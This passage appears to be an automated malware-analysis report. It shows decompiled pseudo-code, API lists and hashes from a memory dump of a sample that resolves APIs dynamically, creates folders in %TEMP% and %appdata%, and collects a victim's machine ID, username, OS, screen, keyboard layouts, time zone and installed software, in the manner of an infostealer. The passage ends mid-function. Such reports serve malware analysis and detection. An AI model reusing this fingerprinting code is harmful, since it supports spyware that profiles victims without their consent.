                                                                                                                                                                                          				if( *0x41c7bc != 0) {
                                                                                                                                                                                          					E00408120(0x84,  &_v64);
                                                                                                                                                                                          					 *0x41c784 = GetProcAddress( *0x41c7bc, E00403990(_v64));
                                                                                                                                                                                          					E00408120(0x85,  &_v68);
                                                                                                                                                                                          					 *0x41c788 = GetProcAddress( *0x41c7bc, E00403990(_v68));
                                                                                                                                                                                          					E00408120(0x86,  &_v72);
                                                                                                                                                                                          					 *0x41c78c = GetProcAddress( *0x41c7bc, E00403990(_v72));
                                                                                                                                                                                          					E00408120(0x87,  &_v76);
                                                                                                                                                                                          					 *0x41c790 = GetProcAddress( *0x41c7bc, E00403990(_v76));
                                                                                                                                                                                          					E00408120(0x88,  &_v80);
                                                                                                                                                                                          					 *0x41c794 = GetProcAddress( *0x41c7bc, E00403990(_v80));
                                                                                                                                                                                          					E00408120(0x89,  &_v84);
                                                                                                                                                                                          					 *0x41c798 = GetProcAddress( *0x41c7bc, E00403990(_v84));
                                                                                                                                                                                          					E00408120(0x8a,  &_v88);
                                                                                                                                                                                          					 *0x41c79c = GetProcAddress( *0x41c7bc, E00403990(_v88));
                                                                                                                                                                                          					E00408120(0x12,  &_v92);
                                                                                                                                                                                          					 *0x41c7a0 = GetProcAddress( *0x41c7bc, E00403990(_v92));
                                                                                                                                                                                          					E00408120(0x13,  &_v96);
                                                                                                                                                                                          					 *0x41c7a4 = GetProcAddress( *0x41c7bc, E00403990(_v96));
                                                                                                                                                                                          					E00408120(0x14,  &_v100);
                                                                                                                                                                                          					 *0x41c7a8 = GetProcAddress( *0x41c7bc, E00403990(_v100));
                                                                                                                                                                                          					E00408120(0x15,  &_v104);
                                                                                                                                                                                          					 *0x41c7ac = GetProcAddress( *0x41c7bc, E00403990(_v104));
                                                                                                                                                                                          					E00408120(0x16,  &_v108);
                                                                                                                                                                                          					 *0x41c7b0 = GetProcAddress( *0x41c7bc, E00403990(_v108));
                                                                                                                                                                                          					E00408120(0x17,  &_v112);
                                                                                                                                                                                          					 *0x41c7b4 = GetProcAddress( *0x41c7bc, E00403990(_v112));
                                                                                                                                                                                          					if( *0x41c784 != 0 &&  *0x41c788 != 0 &&  *0x41c78c != 0 &&  *0x41c790 != 0 &&  *0x41c794 != 0 &&  *0x41c798 != 0 &&  *0x41c79c != 0 &&  *0x41c7a0 != 0 &&  *0x41c7a4 != 0 &&  *0x41c7a8 != 0 &&  *0x41c7ac != 0 &&  *0x41c7b0 != 0 &&  *0x41c7b4 != 0) {
                                                                                                                                                                                          						 *0x41b0d8 = 1;
                                                                                                                                                                                          					}
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_pop(_t241);
                                                                                                                                                                                          				 *[fs:eax] = _t241;
                                                                                                                                                                                          				_push(E00408788);
                                                                                                                                                                                          				E00403508( &_v112, 0xd);
                                                                                                                                                                                          				E00403B98( &_v60, 8);
                                                                                                                                                                                          				E00403508( &_v28, 3);
                                                                                                                                                                                          				E00403B98( &_v16, 2);
                                                                                                                                                                                          				return E004034E4( &_v8);
                                                                                                                                                                                          			}









































                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084E4
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040850D
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408530
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408553
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408576
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408599
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085BC
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085DF
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408602
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408625
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408648
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040866B
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040868E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004086B1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$CreateDirectory$LibraryLoad
                                                                                                                                                                                          • String ID: %TEMP%\$%appdata%\$PATH
                                                                                                                                                                                          • API String ID: 1305945209-1089150275
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 44%
                                                                                                                                                                                          			E00417278(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __esi) {
                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                          				char _v32;
                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                          				char _v48;
                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                          				char _v56;
                                                                                                                                                                                          				intOrPtr _v60;
                                                                                                                                                                                          				char _v64;
                                                                                                                                                                                          				char _v68;
                                                                                                                                                                                          				char _v72;
                                                                                                                                                                                          				char _v76;
                                                                                                                                                                                          				char _v80;
                                                                                                                                                                                          				char _v84;
                                                                                                                                                                                          				char _v88;
                                                                                                                                                                                          				char _v92;
                                                                                                                                                                                          				char _v96;
                                                                                                                                                                                          				char _v100;
                                                                                                                                                                                          				signed char _t59;
                                                                                                                                                                                          				intOrPtr* _t60;
                                                                                                                                                                                          				intOrPtr* _t142;
                                                                                                                                                                                          				void* _t143;
                                                                                                                                                                                          				intOrPtr _t173;
                                                                                                                                                                                          				void* _t181;
                                                                                                                                                                                          				intOrPtr _t184;
                                                                                                                                                                                          				intOrPtr _t185;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t182 = __esi;
                                                                                                                                                                                          				_t59 = __eax +  *__eax;
                                                                                                                                                                                          				 *_t59 =  *_t59 + _t59;
                                                                                                                                                                                          				asm("das");
                                                                                                                                                                                          				 *_t59 =  *_t59 + _t59;
                                                                                                                                                                                          				 *__edx =  *__edx + _t59;
                                                                                                                                                                                          				 *_t59 =  *_t59 + _t59;
                                                                                                                                                                                          				 *_t59 =  *_t59 + _t59;
                                                                                                                                                                                          				 *_t59 =  *_t59 & _t59;
                                                                                                                                                                                          				 *_t59 =  *_t59 + _t59;
                                                                                                                                                                                          				_t60 = _t59 +  *_t59;
                                                                                                                                                                                          				 *_t60 =  *_t60 + _t60;
                                                                                                                                                                                          				 *_t60 =  *_t60 + _t60;
                                                                                                                                                                                          				_t184 = _t185;
                                                                                                                                                                                          				_t143 = 0xc;
                                                                                                                                                                                          				do {
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_t143 = _t143 - 1;
                                                                                                                                                                                          					_t191 = _t143;
                                                                                                                                                                                          				} while (_t143 != 0);
                                                                                                                                                                                          				_t142 = _t60;
                                                                                                                                                                                          				_push(_t184);
                                                                                                                                                                                          				_push(0x41757c);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t185;
                                                                                                                                                                                          				_push("MachineID :   ");
                                                                                                                                                                                          				E00406C4C( &_v8, _t142, __esi);
                                                                                                                                                                                          				_push(_v8);
                                                                                                                                                                                          				_push(0x4175a8);
                                                                                                                                                                                          				E00403850();
                                                                                                                                                                                          				_push( *_t142);
                                                                                                                                                                                          				_push("EXE_PATH  :   ");
                                                                                                                                                                                          				E00416F88(0,  &_v12);
                                                                                                                                                                                          				_push(_v12);
                                                                                                                                                                                          				_push(0x4175cc);
                                                                                                                                                                                          				E00403850();
                                                                                                                                                                                          				_push( *_t142);
                                                                                                                                                                                          				_push("Windows    :   ");
                                                                                                                                                                                          				E00407A4C( &_v28, _t142, _t181, __esi);
                                                                                                                                                                                          				_push(_v28);
                                                                                                                                                                                          				_push(0x4175f4);
                                                                                                                                                                                          				E00403850();
                                                                                                                                                                                          				E00403D2C( &_v20, _v24);
                                                                                                                                                                                          				_push(_v20);
                                                                                                                                                                                          				E004066C0( &_v32, _t191);
                                                                                                                                                                                          				_push(_v32);
                                                                                                                                                                                          				_push(0x4175fc);
                                                                                                                                                                                          				E00406BB4( &_v36);
                                                                                                                                                                                          				_push(_v36);
                                                                                                                                                                                          				_push(0x417604);
                                                                                                                                                                                          				E00403E1C();
                                                                                                                                                                                          				E0040377C(_t142, _v16);
                                                                                                                                                                                          				E004037DC( &_v48, "Computer(Username) :   ",  *_t142);
                                                                                                                                                                                          				E00403D2C( &_v44, _v48);
                                                                                                                                                                                          				_push(_v44);
                                                                                                                                                                                          				E00406610( &_v52);
                                                                                                                                                                                          				_push(_v52);
                                                                                                                                                                                          				_push(0x417630);
                                                                                                                                                                                          				E004065CC( &_v56);
                                                                                                                                                                                          				_push(_v56);
                                                                                                                                                                                          				_push(0x417638);
                                                                                                                                                                                          				_push(0x417604);
                                                                                                                                                                                          				E00403E1C();
                                                                                                                                                                                          				E0040377C(_t142, _v40);
                                                                                                                                                                                          				E004037DC( &_v68, "Screen: ",  *_t142);
                                                                                                                                                                                          				E00403D2C( &_v64, _v68);
                                                                                                                                                                                          				_push(_v64);
                                                                                                                                                                                          				E00406FDC(GetSystemMetrics(0), _t142,  &_v72, __esi, _t191);
                                                                                                                                                                                          				_push(_v72);
                                                                                                                                                                                          				_push(0x417654);
                                                                                                                                                                                          				E00406FDC(GetSystemMetrics(1), _t142,  &_v76, _t182, _t191);
                                                                                                                                                                                          				_push(_v76);
                                                                                                                                                                                          				_push(0x417604);
                                                                                                                                                                                          				E00403E1C();
                                                                                                                                                                                          				E0040377C(_t142, _v60);
                                                                                                                                                                                          				_push( *_t142);
                                                                                                                                                                                          				_push("Layouts: ");
                                                                                                                                                                                          				E00416FB8( &_v80, _t142, _t181, _t182);
                                                                                                                                                                                          				_push(_v80);
                                                                                                                                                                                          				_push(0x4175a8);
                                                                                                                                                                                          				E00403850();
                                                                                                                                                                                          				_push( *_t142);
                                                                                                                                                                                          				_push("LocalTime: ");
                                                                                                                                                                                          				E00417198( &_v84, _t142, _t182);
                                                                                                                                                                                          				_push(_v84);
                                                                                                                                                                                          				_push(0x4175a8);
                                                                                                                                                                                          				E00403850();
                                                                                                                                                                                          				_push( *_t142);
                                                                                                                                                                                          				_push("Zone: ");
                                                                                                                                                                                          				E00417098( &_v88, _t142, _t181, _t182, _t191);
                                                                                                                                                                                          				_push(_v88);
                                                                                                                                                                                          				_push(0x4175cc);
                                                                                                                                                                                          				E00403850();
                                                                                                                                                                                          				_push( *_t142);
                                                                                                                                                                                          				E00416748( &_v92, _t142, _t181, _t182);
                                                                                                                                                                                          				_push(_v92);
                                                                                                                                                                                          				_push(0x4175cc);
                                                                                                                                                                                          				E00403850();
                                                                                                                                                                                          				Sleep(1);
                                                                                                                                                                                          				_push( *_t142);
                                                                                                                                                                                          				E00416B94( &_v96, _t142, _t181, _t182, _t191);
                                                                                                                                                                                          				_push(_v96);
                                                                                                                                                                                          				_push(0x4175a8);
                                                                                                                                                                                          				_push(0x4175a8);
                                                                                                                                                                                          				E00403850();
                                                                                                                                                                                          				Sleep(1);
                                                                                                                                                                                          				_push( *_t142);
                                                                                                                                                                                          				_push("[Soft]");
                                                                                                                                                                                          				E00403850();
                                                                                                                                                                                          				Sleep(1);
                                                                                                                                                                                          				E00415F30( &_v100, _t142, _t181, _t182);
                                                                                                                                                                                          				E00403798(_t142, _v100);
                                                                                                                                                                                          				_t173 = 0x4175a8;
                                                                                                                                                                                          				 *[fs:eax] = _t173;
                                                                                                                                                                                          				_push(E00417583);
                                                                                                                                                                                          				E00403508( &_v100, 6);
                                                                                                                                                                                          				E00403B98( &_v76, 2);
                                                                                                                                                                                          				E004034E4( &_v68);
                                                                                                                                                                                          				E00403B98( &_v64, 4);
                                                                                                                                                                                          				E004034E4( &_v48);
                                                                                                                                                                                          				E00403B98( &_v44, 4);
                                                                                                                                                                                          				E00403508( &_v28, 2);
                                                                                                                                                                                          				E00403B98( &_v20, 2);
                                                                                                                                                                                          				return E00403508( &_v12, 2);
                                                                                                                                                                                          			}




































                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 004173D7
                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 004173EE
                                                                                                                                                                                            • Part of subcall function 00416748: GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                                                                                                                                                                                          • Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8,?,Layouts: ,?), ref: 004174A3
                                                                                                                                                                                            • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
                                                                                                                                                                                            • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
                                                                                                                                                                                            • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
                                                                                                                                                                                            • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
                                                                                                                                                                                            • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
                                                                                                                                                                                            • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
                                                                                                                                                                                          • Sleep.KERNEL32(00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ), ref: 004174CD
                                                                                                                                                                                          • Sleep.KERNEL32(00000001,004175A8,[Soft],?,00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ), ref: 004174EC
                                                                                                                                                                                            • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
                                                                                                                                                                                            • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
                                                                                                                                                                                            • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
                                                                                                                                                                                            • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8
                                                                                                                                                                                            • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
                                                                                                                                                                                          • String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
                                                                                                                                                                                          • API String ID: 75899496-943277980
                                                                                                                                                                                          • Opcode ID: 4be26f394024ad5c91b88013eb9f7e22f1757fe5255d0d7559962d2f1b93f894
                                                                                                                                                                                          • Instruction ID: faa4580c3751e67dc94fa71ed2fe839e62200f283c7ef28ebc39c5cb7ba49714
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4be26f394024ad5c91b88013eb9f7e22f1757fe5255d0d7559962d2f1b93f894
                                                                                                                                                                                          • Instruction Fuzzy Hash: 94814F70A44209AFCB01FFA1CC42BCDBF7AAF49309F60407BB104B65D6D67D9A568B19
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 43%
                                                                                                                                                                                          			E0041727C(signed int __eax, void* __ebx, intOrPtr* __edx, void* __esi) {
                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                          				char _v32;
                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                          				char _v48;
                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                          				char _v56;
                                                                                                                                                                                          				intOrPtr _v60;
                                                                                                                                                                                          				char _v64;
                                                                                                                                                                                          				char _v68;
                                                                                                                                                                                          				char _v72;
                                                                                                                                                                                          				char _v76;
                                                                                                                                                                                          				char _v80;
                                                                                                                                                                                          				char _v84;
                                                                                                                                                                                          				char _v88;
                                                                                                                                                                                          				char _v92;
                                                                                                                                                                                          				char _v96;
                                                                                                                                                                                          				char _v100;
                                                                                                                                                                                          				intOrPtr* _t59;
                                                                                                                                                                                          				intOrPtr* _t141;
                                                                                                                                                                                          				void* _t142;
                                                                                                                                                                                          				intOrPtr _t172;
                                                                                                                                                                                          				void* _t180;
                                                                                                                                                                                          				intOrPtr _t183;
                                                                                                                                                                                          				intOrPtr _t184;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t181 = __esi;
                                                                                                                                                                                          				asm("das");
                                                                                                                                                                                          				 *__eax =  *__eax + __eax;
                                                                                                                                                                                          				 *__edx =  *__edx + __eax;
                                                                                                                                                                                          				 *__eax =  *__eax + __eax;
                                                                                                                                                                                          				 *__eax =  *__eax + __eax;
                                                                                                                                                                                          				 *__eax =  *__eax & __eax;
                                                                                                                                                                                          				 *__eax =  *__eax + __eax;
                                                                                                                                                                                          				_t59 = __eax +  *__eax;
                                                                                                                                                                                          				 *_t59 =  *_t59 + _t59;
                                                                                                                                                                                          				 *_t59 =  *_t59 + _t59;
                                                                                                                                                                                          				_t183 = _t184;
                                                                                                                                                                                          				_t142 = 0xc;
                                                                                                                                                                                          				do {
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_t142 = _t142 - 1;
                                                                                                                                                                                          					_t189 = _t142;
                                                                                                                                                                                          				} while (_t142 != 0);
                                                                                                                                                                                          				_t141 = _t59;
                                                                                                                                                                                          				_push(_t183);
                                                                                                                                                                                          				_push(0x41757c);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t184;
                                                                                                                                                                                          				_push("MachineID :   ");
                                                                                                                                                                                          				E00406C4C( &_v8, _t141, __esi);
                                                                                                                                                                                          				_push(_v8);
                                                                                                                                                                                          				_push(0x4175a8);
                                                                                                                                                                                          				E00403850();
                                                                                                                                                                                          				_push( *_t141);
                                                                                                                                                                                          				_push("EXE_PATH  :   ");
                                                                                                                                                                                          				E00416F88(0,  &_v12);
                                                                                                                                                                                          				_push(_v12);
                                                                                                                                                                                          				_push(0x4175cc);
                                                                                                                                                                                          				E00403850();
                                                                                                                                                                                          				_push( *_t141);
                                                                                                                                                                                          				_push("Windows    :   ");
                                                                                                                                                                                          				E00407A4C( &_v28, _t141, _t180, __esi);
                                                                                                                                                                                          				_push(_v28);
                                                                                                                                                                                          				_push(0x4175f4);
                                                                                                                                                                                          				E00403850();
                                                                                                                                                                                          				E00403D2C( &_v20, _v24);
                                                                                                                                                                                          				_push(_v20);
                                                                                                                                                                                          				E004066C0( &_v32, _t189);
                                                                                                                                                                                          				_push(_v32);
                                                                                                                                                                                          				_push(0x4175fc);
                                                                                                                                                                                          				E00406BB4( &_v36);
                                                                                                                                                                                          				_push(_v36);
                                                                                                                                                                                          				_push(0x417604);
                                                                                                                                                                                          				E00403E1C();
                                                                                                                                                                                          				E0040377C(_t141, _v16);
                                                                                                                                                                                          				E004037DC( &_v48, "Computer(Username) :   ",  *_t141);
                                                                                                                                                                                          				E00403D2C( &_v44, _v48);
                                                                                                                                                                                          				_push(_v44);
                                                                                                                                                                                          				E00406610( &_v52);
                                                                                                                                                                                          				_push(_v52);
                                                                                                                                                                                          				_push(0x417630);
                                                                                                                                                                                          				E004065CC( &_v56);
                                                                                                                                                                                          				_push(_v56);
                                                                                                                                                                                          				_push(0x417638);
                                                                                                                                                                                          				_push(0x417604);
                                                                                                                                                                                          				E00403E1C();
                                                                                                                                                                                          				E0040377C(_t141, _v40);
                                                                                                                                                                                          				E004037DC( &_v68, "Screen: ",  *_t141);
                                                                                                                                                                                          				E00403D2C( &_v64, _v68);
                                                                                                                                                                                          				_push(_v64);
                                                                                                                                                                                          				E00406FDC(GetSystemMetrics(0), _t141,  &_v72, __esi, _t189);
                                                                                                                                                                                          				_push(_v72);
                                                                                                                                                                                          				_push(0x417654);
                                                                                                                                                                                          				E00406FDC(GetSystemMetrics(1), _t141,  &_v76, _t181, _t189);
                                                                                                                                                                                          				_push(_v76);
                                                                                                                                                                                          				_push(0x417604);
                                                                                                                                                                                          				E00403E1C();
                                                                                                                                                                                          				E0040377C(_t141, _v60);
                                                                                                                                                                                          				_push( *_t141);
                                                                                                                                                                                          				_push("Layouts: ");
                                                                                                                                                                                          				E00416FB8( &_v80, _t141, _t180, _t181);
                                                                                                                                                                                          				_push(_v80);
                                                                                                                                                                                          				_push(0x4175a8);
                                                                                                                                                                                          				E00403850();
                                                                                                                                                                                          				_push( *_t141);
                                                                                                                                                                                          				_push("LocalTime: ");
                                                                                                                                                                                          				E00417198( &_v84, _t141, _t181);
                                                                                                                                                                                          				_push(_v84);
    _push(0x4175a8);
    E00403850();
    _push( *_t141);
    _push("Zone: ");
    E00417098( &_v88, _t141, _t180, _t181, _t189);
    _push(_v88);
    _push(0x4175cc);
    E00403850();
    _push( *_t141);
    E00416748( &_v92, _t141, _t180, _t181);
    _push(_v92);
    _push(0x4175cc);
    E00403850();
    Sleep(1);
    _push( *_t141);
    E00416B94( &_v96, _t141, _t180, _t181, _t189);
    _push(_v96);
    _push(0x4175a8);
    _push(0x4175a8);
    E00403850();
    Sleep(1);
    _push( *_t141);
    _push("[Soft]");
    E00403850();
    Sleep(1);
    E00415F30( &_v100, _t141, _t180, _t181);
    E00403798(_t141, _v100);
    _t172 = 0x4175a8;
     *[fs:eax] = _t172;
    _push(E00417583);
    E00403508( &_v100, 6);
    E00403B98( &_v76, 2);
    E004034E4( &_v68);
    E00403B98( &_v64, 4);
    E004034E4( &_v48);
    E00403B98( &_v44, 4);
    E00403508( &_v28, 2);
    E00403B98( &_v20, 2);
    return E00403508( &_v12, 2);
}

APIs
• GetSystemMetrics.USER32 ref: 004173D7
• GetSystemMetrics.USER32 ref: 004173EE
  • Part of subcall function 00416748: GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
• Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8,?,Layouts: ,?), ref: 004174A3
  • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
  • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
  • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
  • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
  • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
  • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
• Sleep.KERNEL32(00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ), ref: 004174CD
• Sleep.KERNEL32(00000001,004175A8,[Soft],?,00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ), ref: 004174EC
                                                                                                                                                                                            • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
                                                                                                                                                                                            • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
                                                                                                                                                                                            • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
                                                                                                                                                                                            • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8
                                                                                                                                                                                            • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
                                                                                                                                                                                          • String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
                                                                                                                                                                                          • API String ID: 75899496-943277980
                                                                                                                                                                                          • Opcode ID: c1c0bba0cf5750b68568b08facd4bf438261c5427543421f404452287209528a
                                                                                                                                                                                          • Instruction ID: 915cc31ebaf767ee9912e0c916b5d60c1651ad94c460c6a34579714c0f7d2b16
                                                                                                                                                                                          • Opcode Fuzzy Hash: c1c0bba0cf5750b68568b08facd4bf438261c5427543421f404452287209528a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A814E70A44209AFCB01FFA1CC42BCDBF7AAF49309F60407BB104B65D6D67D9A468B19
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 40%
                                                                                                                                                                                          			E00417290(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                          				char _v32;
                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                          				char _v48;
                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                          				char _v56;
                                                                                                                                                                                          				intOrPtr _v60;
                                                                                                                                                                                          				char _v64;
                                                                                                                                                                                          				char _v68;
                                                                                                                                                                                          				char _v72;
                                                                                                                                                                                          				char _v76;
                                                                                                                                                                                          				char _v80;
                                                                                                                                                                                          				char _v84;
                                                                                                                                                                                          				char _v88;
                                                                                                                                                                                          				char _v92;
                                                                                                                                                                                          				char _v96;
                                                                                                                                                                                          				char _v100;
                                                                                                                                                                                          				intOrPtr* _t140;
                                                                                                                                                                                          				void* _t141;
                                                                                                                                                                                          				intOrPtr _t171;
                                                                                                                                                                                          				intOrPtr _t182;
                                                                                                                                                                                          				intOrPtr _t183;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t180 = __esi;
                                                                                                                                                                                          				_t179 = __edi;
                                                                                                                                                                                          				_t182 = _t183;
                                                                                                                                                                                          				_t141 = 0xc;
                                                                                                                                                                                          				do {
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_t141 = _t141 - 1;
                                                                                                                                                                                          					_t184 = _t141;
                                                                                                                                                                                          				} while (_t141 != 0);
                                                                                                                                                                                          				_t140 = __eax;
                                                                                                                                                                                          				_push(_t182);
                                                                                                                                                                                          				_push(0x41757c);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t183;
                                                                                                                                                                                          				_push("MachineID :   ");
